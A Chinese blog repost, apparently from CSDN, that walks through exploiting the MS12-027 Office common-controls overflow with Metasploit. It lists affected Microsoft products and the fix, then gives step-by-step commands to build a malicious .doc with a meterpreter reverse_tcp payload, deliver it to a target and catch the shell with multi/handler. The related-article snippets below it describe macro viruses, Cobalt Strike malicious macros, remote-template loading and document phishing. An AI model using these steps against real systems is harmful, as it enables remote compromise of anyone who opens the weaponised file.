利用恶意office文档得shell

最新推荐文章于 2025-12-10 19:03:04 发布
转载 最新推荐文章于 2025-12-10 19:03:04 发布 · 222 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/freem/p/6493363.html
文章标签:

#shell #runtime

本文介绍MS12-027漏洞及其影响的Microsoft产品,包括Office和SQL Server等,并提供利用Metasploit框架进行漏洞攻击的详细步骤。

Ms 12_027 微软 windows常用控件中的漏洞

!!!!!!!!!!!!!!!!!!!!

对其默认安装中的包括windows常用控件的所有受支持的microsoft软件

包括 microsoft office2003、microsoft office2007的所有受支持版本;Micrsoft office2010(基于行x64版本除外)Microsoft SQL Server 2000 Analysis Services、Microsoft SQL Server 2000(基于 Itanium 的版本除外)、Microsoft SQL Server 2005(Microsoft SQL Server 2005 Express Edition 除外,但是包括 Microsoft SQL Server 2005 Express Edition with Advanced Services)、Microsoft SQL Server 2008、Microsoft SQL Server 2008 R2、Microsoft BizTalk Server 2002、Microsoft Commerce Server 2002、Microsoft Commerce Server 2007、Microsoft Commerce Server 2009、Microsoft Commerce Server 2009 R2、Microsoft Visual FoxPro 8.0、Microsoft Visual FoxPro 9.0 和 Visual Basic 6.0 Runtime

解决方案:禁用windows常用控件的容易受攻击版本,并将其替换为不包含漏洞的新版本来解决漏洞。

!!!!!!!!!!!!!!!!!!!!

漏洞利用:

1、首先打开metasploit,并进入msf控制台:

 

2、使用漏洞利用模块ms12_027_mscomctl_bof

use exploit/windows/fileformat/ms12_027_mscomctl_bof

3、添加payload,并查看配置需求

set payload windows/metepreter/reverse_tcp

show options

4、设置  LHOST

set LHOST 192.168.207.134

5、生成恶意文件,为方便查看,特将文件复制到桌面上;

exploit

cp /root/.msf5/local/msf.doc /root/Desktop/

6、将生成的文件,传到目标靶机上

7、设置利用exploit/multi/handler模块 (后门)

set exploit/multi/handler

8、添加payload

set payload windows/metepreter/reverse_tcp

9、配置LHOST

10、exploit,等待目标上线~!

11、在目标主机上打开恶意office文件

12、漏洞利用成功

 

转载于:https://www.cnblogs.com/freem/p/6493363.html

利用宏感染Word文档获取Shell
YtyVerilog的博客
09-20 408
通过插入恶意宏并传播包含恶意宏的文档,攻击者可以获取受害者的Shell利用宏感染Word文档获取Shell 的攻击原理基于恶意宏(Macro)的利用。攻击者通过在Word文档中插入恶意宏,当受害者打开该文档时,恶意宏将被执行,从而导致Shell(命令行界面)的获取。当受害者打开包含恶意宏的文档时,恶意宏将执行Shell 函数调用,与远程主机建立连接并获取Shell。上述恶意宏代码在文档打开时会自动执行,它使用Shell函数调用cmd.exe 并与远程主机建立连接,从而获取Shell
office宏病毒反弹shell实验
AFCC_的博客(Web_Dog)
12-10 1401
0x00 什么是宏病毒 宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行 Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。 AutoExec:启动 Word 或加载全局模板时 AutoNew:每次新建文档时 AutoOpen:每次打开已有文档时 ...
Metasploit之宏病毒攻击演示
KEY0NE的个人博客
11-02 1403
摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:受害机:win10(192.168.8.123) 攻击机:kali(192.168.8.131)攻击演示:1、生成能反弹会话的宏病毒代码use windows/meterpreter/reverse_tcp set lhost 192...
利用ms12_027漏洞生成文字马
sky
06-18 490
利用ms12_027漏洞生成文字马   漏洞危及版本 :MicrosoftOffice 2007 原文地址:www.wobushi.cn     root@kali:~# msfconsole msf> useexploit/windows/fileformat/ms12_027_mscomctl_bof msfexploit(ms12_027_mscomctl_bof) > s
MSF实战制作Linux恶意软件包
永远是少年
06-13 1159
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件包后门。 一、恶意软件生成 二、监听设置 三、效果检验
使用Metasploit生成Word文件对目标进行渗透测试
渗透测试
05-13 850
上一篇提到了使用恶意PDF对目标主机进行渗透测试,这次简单提一下使用word文件进行渗透攻击,没看过上一篇的可以看一下,了解下基本步骤 使用恶意PDF进行渗透测试 测试用例 描述 漏洞 microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击 受影响的系统 Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for Mac 2011 生成恶意wo
使用恶意捆绑URL工具入侵Windows(恶意文档利用)
我不是猫叔
09-08 685
恶意盗取Windows 登录密码的Word 文档 通过使用phishery工具将恶意url注入到word文档,这将导致MicrosoftWord向URL发出请求,从而向最终用户显示身份验证对话框。可以使用phishery的URL注入任何.docx文件。 第一步:根据需要修改提供的setings.json文件,默认情况下它应该如下所示 { “ip”: “0.0.0.0”, “port”: “443...
恶意文档攻击溯源:Office宏流量与CobaltStrike通信分析
攻击者常利用用户对Office文档的信任心理,将含有VBA宏代码的文件伪装成发票、合同或通知等正常办公文件,诱导用户启用宏功能,从而触发恶意代码执行。此类攻击具有隐蔽性强、绕过率高、传播速度快等特点,已成为...
一键修复:右键菜单无新建Office文档选项
当系统刚安装完毕后,可能会遇到右键菜单中缺少“新建Office文档”选项的情况,这会影响用户的使用体验,因为这一功能使得用户能够直接从右键菜单中创建新的Word、Excel或PowerPoint文档,而无需打开相应的Office...
Invoke-NoShell: 利用PowerShell提升Word文档宏攻击效率
宏是一种能够自动化执行重复性任务的脚本,通常在Office文档中使用。在恶意攻击中,宏常被用来加载恶意软件。该工具可以测试多个相似版本的文件,以观察细微差异如何影响执行结果。这表明Invoke-NoShell可能被用于...
kali中使用msf制作Windows恶意软件获取shell
weixin_43894771的博客
03-09 1275
1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...
在linux下利用shell脚本进行openoffice的一键启动
乘风归去
07-14 1406
    openoffice启动需要输入以下指令:cd /opt/openoffice4/program/ soffice --headless--accept="socket,host=127.0.0.1,port=8100;urp;" --nofirststartwizard&     比较麻烦,写shell脚本来实现一键启动:    首先在home目录下建立一个Shell文件夹专门放...
Cobaltstrike -恶意宏文件
weixin_30492601的博客
03-06 1144
Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的...
Metasploit——客户端渗透
m0_62063669的博客
08-10 1322
2.社会工程学:骗取敏感信息,诱使目标执行含有漏洞利用代码的DOC、PDF等Payload。生成这个payload,就要生成一个安卓系统上可用的安装包文件,比如说一个.apk的安装包。目标访问恶意网站,漏洞利用代码会执行,进一步执行payload,然后反弹shell。在创建的宏里粘入Payload第一部分的VBA代码。1.含有漏洞利用代码的WEB站点:利用客户端漏洞。只要目标客户端执行制作的exe文件,就可获得目标shell。由Jjiktezjhl到最后。4. 利用Flash漏洞执行payload。....
linux脚本能生成excel吗,使用shell生成excel
weixin_33940469的博客
05-01 3415
前言:linux下常常需要统计各种数据,生成好之后,往往还需要按行,逐个复制到excel中,繁琐的非常的不人道,无意中发现可以使用csv来解决这个问题,思路就是使用shell将需要统计的内容生成csv文件,然后使用office将csv文件转换成excel,即使不能解决所有的问题,也可以在csv文件中直接复制表格来大大减少繁琐程度。补充:CSV是一种通用的、相对简单的文件格式,被用户、商业和科学广泛...
远程加载含有恶意代码的word模版文件上线CS
热门推荐
Shanfenglan's blog
08-31 24万+
原理 将直接加载远程带有宏的恶意模版使用。 缺点 目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github),受害者可能在文件打开一半的时候强制关闭word。 优点 因为是远程加载,所以免杀效果十分不错。基本不会被杀毒软件拦截。 实现 第一步:制作一个恶意的模版并确保能够上线 这里以cs的宏木马为例。 获取到恶意的VB代码后打开word,在工具栏的空白区域右键,点击自定义功能区 勾选开发工具选项。 此时就会出现开发工具这一栏 此时点击Visual basi
ubuntu系统adb shell报错 ADB server didn‘t ACK
slaughteryou的专栏
12-08 425
解决方法:使用正常可以adb调试的机器,将路径/usr/lib/udev/rules.d/51-android.rules拷贝至异常机器的/usr/lib/udev/rules.d/路径下。这个错误表明 ADB 无法启动守护进程(adb daemon),主要原因是 USB 设备访问权限不足(Access denied (insufficient permissions))。ubuntu下连接设备首次使用adb shell报错ADB server didn’t ACK。可以正常识别到设备,问题解决!
Kubernetes 持久化存储与特殊容器
最新发布
2503_92914039的博客
12-10 358
在 Kubernetes 集群中,容器的生命周期是短暂的,当 Pod 被删除或重启时,容器内的数据会随之丢失。对于 MySQL、Redis 等需要持久化数据的应用来说,持久化存储至关重要。同时,Kubernetes 还提供了特殊容器来应对特定场景的需求,本文将详细介绍这些内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值